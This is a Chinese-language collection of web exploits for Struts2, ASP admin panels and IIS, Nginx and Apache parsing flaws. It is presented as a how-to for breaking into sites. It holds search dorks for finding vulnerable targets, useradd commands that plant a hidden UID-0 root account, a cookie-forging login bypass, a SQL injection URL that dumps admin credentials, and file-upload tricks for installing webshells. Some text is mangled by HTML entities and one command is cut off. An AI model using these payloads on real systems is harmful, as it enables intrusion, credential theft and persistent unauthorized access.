phpweb程序漏洞,各种web程序漏洞

收集整理的各种web漏洞

struts2:

Inurl:index.action

Inurl:商城.action

Inurl:index.action 标题:apache struts2

Inurl:action?id&＃61;

site:.com inurl:index.action

inurl:dhis-web-commons

利用工具操作&＃xff0c;账号密码添加:

useradd -u 0 -o -g root -G root -d /home/bingdao bingdao -p $1$jWIKT776$A8S37J9KR3Z4dpbJVX3rW0

账号&＃xff1a;bingdao

密码&＃xff1a;1

生成加密密码详情&＃xff1a;

以下为生成加密密码命令(第一个1就是密码):

echo "1" | openssl passwd -1 -salt $(

生成的加密密码&＃xff1a;$1$Rfst5gRR$dqbE2NR0npnFMyeLchbk0/

然后添加权限为root的账号和上面的密码&＃xff1a;

useradd -u 0 -o -g root -G root -d /home/lengyu lengyu -p&＃39;$1$Rfst5gRR$dqbE2NR0npnFMyeLchbk0/&＃39;

就得到了账号为“lengyu”&＃xff0c;密码为“1”的用户&＃xff0c;然后再ssh上去

------------------------------------------------------

szwyadmin COOKIEs欺骗&＃xff1a;

inurl:szwyadmin/login.asp

inurl:szwyadmin

代码&＃xff1a;Javascript:alert(document.COOKIE&＃61;"adminuser&＃61;"&＃43;escape("&＃39;or&＃39;&＃61;&＃39;or&＃39;"));Javascript:alert(document.COOKIE&＃61;"adminpass&＃61;"&＃43;escape("&＃39;or&＃39;&＃61;&＃39;or&＃39;"));Javascript:alert(document.COOKIE&＃61;"admindj&＃61;"&＃43;escape("1"));

代码复制然后回车。。~ 方便快捷。。然后关闭网页重新打开后台地址,然后在地址栏中将login.asp改为admin_index.asp 就直接进入后台了,这种方法成功率百分之80以上。

另外这套程序还有一个爆密码的oday。

使用方法很简单。直接填写域名然后点击爆密码。~~~  直接射出管理员帐号密码。成功率不是很理想毕竟是很多的漏洞了.

-------------------------------------------------------------------------------------------------------------------------

南方数据:

inurl:HrDemand.asp

/NewsType.asp?SmallClass&＃61;&＃39;%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201&＃61;2%20and%20&＃39;&＃39;&＃61;&＃39;

admin/southidceditor/admin_style.asp

--------------------------------------------

爆库&＃xff1a;

inurl:conn.asp

----------------

iis6 解析漏洞:

目录解析  /xx.asp/xx.jpg

说明&＃xff1a;在网站下建立文件夹的名字为 .asp 或 .asa 的文件夹&＃xff0c;其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。

文件解析  1.asp;.jpg

说明&＃xff1a;会被服务器看成是1.asp还有IIS6.0 默认的可执行文件除了asp还包含这三种

/1.asa

/1.cer

/1.cdx

-----------------------------------

iis7.0/iis7.5/ nginx<8.03 畸形解析漏洞&＃xff1a;

Nginx解析漏洞这个伟大的漏洞是我国安全组织80sec发现的…

在默认Fast-CGI开启状况下,黑阔上传一个名字为1.jpg&＃xff0c;内容为

&＃39;);?>

的文件&＃xff0c;然后访问1.jpg/.php,在这个目录下就会生成一句话*** shell.php

------------------------------------------------------------------

Nginx <8.03 空字节代码执行漏洞:

影响版:0.5.,0.6., 0.7 <&＃61; 0.7.65, 0.8 <&＃61; 0.8.37

Nginx在图片中嵌入PHP代码然后通过访问

xxx.jpg%00.php

来执行其中的代码

----------------

Apache 解析漏洞

Apache 是从右到左开始判断解析,如果为不可识别解析,就再往左判断.

比如 wooyun.php.owf.rar “.owf”和”.rar” 这两种后缀是apache不可识别解析,apache就会把wooyun.php.owf.rar解析成php.

如何判断是不是合法的后缀就是这个漏洞的利用关键,测试时可以尝试上传一个wooyun.php.rara.jpg.png…(把你知道的常见后缀都写上…)去测试是否是合法后缀

---------------------------------------------------

在windows环境下&＃xff0c;xx.jpg[空格] 或xx.jpg. 这两类文件都是不允许存在的&＃xff0c;若这样命名&＃xff0c;windows会默认除去空格或点,***可以通过抓包&＃xff0c;在文件名后加一个空格或者点绕过黑名单.若上传成功&＃xff0c;空格和点都会被windows自动消除,这样也可以getshell。

如果在Apache中.htaccess可被执行.且可被上传.那可以尝试在.htaccess中写入:

SetHandler application/x-httpd-php

然后再上传shell.jpg的***, 这样shell.jpg就可解析为php文件